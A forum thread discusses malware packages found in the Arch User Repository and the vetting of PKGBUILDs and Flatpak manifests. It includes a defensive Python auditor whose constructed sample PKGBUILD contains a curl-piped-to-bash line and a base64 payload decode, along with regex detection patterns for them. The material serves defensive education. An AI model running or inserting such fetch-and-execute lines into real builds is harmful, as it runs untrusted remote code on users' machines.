All are gone
There are some more packages posted that are clearly malware.
Submitter: Quobleggo, account created today, with 4 packages, popularity 1 to 10.
Yeah, it seems that the AUR needs to step up their security checks on those; the fact that malware can get away like this is crazy.
This is exactly why I check the Arch repository first, before resorting to the official website and then the AUR.
This is a good "in the wild" example of why the AUR should be used cautiously and as a last resort. And why it is considered important to vet and understand PKGBUILD files yourself before using the AUR, and to understand that packages from the AUR are unofficial and unvetted.
Which security checks? AUR packages are unofficial and don’t get thoroughly vetted.
And this is why people shouldn’t download from the AUR, at least not without auditing and verifying every single package they’ve installed.
Wow, thanks for sharing this info. This was a surprise to me; I had no idea installing software this way was such a security hole. Imagine mistyping a package name and you get straight-up malware. SecureBlue and Flatpaks on my devices seem like the way to go.
Verified / Official Flatpaks. Flatpaks from Flathub are a mix of verified Flatpaks (meaning they have been confirmed to come directly from the software developer, or a representative that the software developer names).
Unofficial Flatpaks (e.g. the Signal Flatpak, Proton Flatpaks, and many others) are somewhat lightly vetted when they are added, but aren’t “official” or endorsed by Flathub. IIRC by default secureblue only enables the verified repository, but I’m not 100% certain about that.
Flatpaks, like AUR packages, can be individually vetted by you or someone you trust: for AUR packages you’d read the PKGBUILD file, for Flatpaks you’d read the manifest file. If you’d rather not do that, it's best to stick to official repositories and verified Flatpaks.
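As an aid to the "read the PKGBUILD yourself" advice above, here is an added example (not code from the thread or from any AUR tooling) that flags the constructs a reviewer should read closely before running makepkg: remote scripts piped into a shell, base64 decoding, eval, skipped checksums, writes outside the build directories, and sources pulled from more than one host. The sample PKGBUILD is constructed for the demonstration; a hit is a reason to read the line, not proof of malware.

```python
import re
from typing import List, Set

# Constructed sample PKGBUILD (not from the thread): it looks ordinary, but its
# build() step pipes a remote script into a shell and decodes an embedded blob.
SAMPLE_PKGBUILD = r"""pkgname=foo-bin
pkgver=1.2.3
source=("https://example.invalid/foo-${pkgver}.tar.gz"
        "https://github.com/example/foo/releases/download/v${pkgver}/foo.tar.gz")
sha256sums=('SKIP' 'SKIP')
build() {
  curl -s https://example.invalid/setup.sh | bash
  echo "aGVsbG8=" | base64 -d > /tmp/payload
}
package() {
  install -Dm755 foo "$pkgdir/usr/bin/foo"
}
"""

# Heuristics a reviewer should read closely, as (label, regex). A hit is not proof
# of malware, only a reason to read that line before running makepkg.
CHECKS = [
    ("remote script piped into a shell",
     re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b")),
    ("base64 decoding of embedded data", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("eval of dynamic content", re.compile(r"\beval\b")),
    ("checksum verification skipped",
     re.compile(r"(sha\d+|md5|b2)sums=\([^)]*\bSKIP\b[^)]*\)")),
    ("writes outside $srcdir/$pkgdir", re.compile(r">\s*(/tmp|/etc|\$HOME|~)/")),
]

def source_hosts(text: str) -> Set[str]:
    """Hostnames in the source=() array, so the reviewer sees where code is fetched from."""
    m = re.search(r"source=\(([^)]*)\)", text)
    if not m:
        return set()
    return set(re.findall(r"https?://([^/\s'\"]+)", m.group(1)))

def audit_pkgbuild(text: str) -> List[str]:
    """Return one finding per heuristic hit, with the PKGBUILD line number."""
    findings = []
    for label, pattern in CHECKS:
        for m in pattern.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append(f"line {line_no}: {label}: {m.group(0).strip()}")
    hosts = source_hosts(text)
    if len(hosts) > 1:  # sources split across unrelated hosts deserve a second look
        findings.append(f"sources fetched from multiple hosts: {', '.join(sorted(hosts))}")
    return findings
```

Running `audit_pkgbuild(SAMPLE_PKGBUILD)` returns five findings for the constructed sample; point it at the text of any PKGBUILD you are about to build and read every flagged line in context.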
Thanks for all of this info.
This is true about SecureBlue; actually, the first thing I do when I install it is add back the Flathub repo, because unfortunately many of the apps I use come from there, like the Proton apps, though I try to keep as much security as possible and only enable what I need in the OS. I haven’t been verifying any manifest files, but I do know some of the apps I use are unofficial. I don’t know enough about it, but I speculate it is harder for someone to, for example, do the same kind of attack on Flathub by making a similar-looking copy of an existing application?
For simpler manifests, it isn’t too complicated (for the rest, it's still over my head).
I’d suggest checking out the Signal manifest (regardless of whether you use Signal Desktop or not). Relatively speaking it’s quite simple, and easy to understand for non-experts, so it's a good learning tool to gain a little confidence reading manifest files, and at least understand the different sections and some potential basic red and yellow flags. I don’t consider myself competent in assessing manifests (far from it), but being able to give a Flatpak a quick once-over gives some peace of mind.
Coincidentally, just a few days ago, I stumbled upon a personal blog post written by an unnamed fellow PG forum member on this topic that is worth a quick read. It's a bit outdated now, but I think they do a good job breaking it down.
don’t know enough about it but I speculate it is harder for someone to for example do the same kind of attack on Flathub by making a similar looking copy of an existing application?
For that specific attack I think you are possibly/probably right. But other risks exist in that same general category of risks (unofficial packages published by someone other than the developer, and not rigorously vetted by the software repo/distributors) which I think unofficial flatpaks would be similarly vulnerable to.
I have a vague impression that it’d be harder to get malicious software into Flathub than into the AUR, but that is setting the bar pretty low, and it is just my impression, not based on concrete evidence I could cite.
Can anyone help me find the PKGBUILD or the dropper script? I’d like to see/analyze how it works.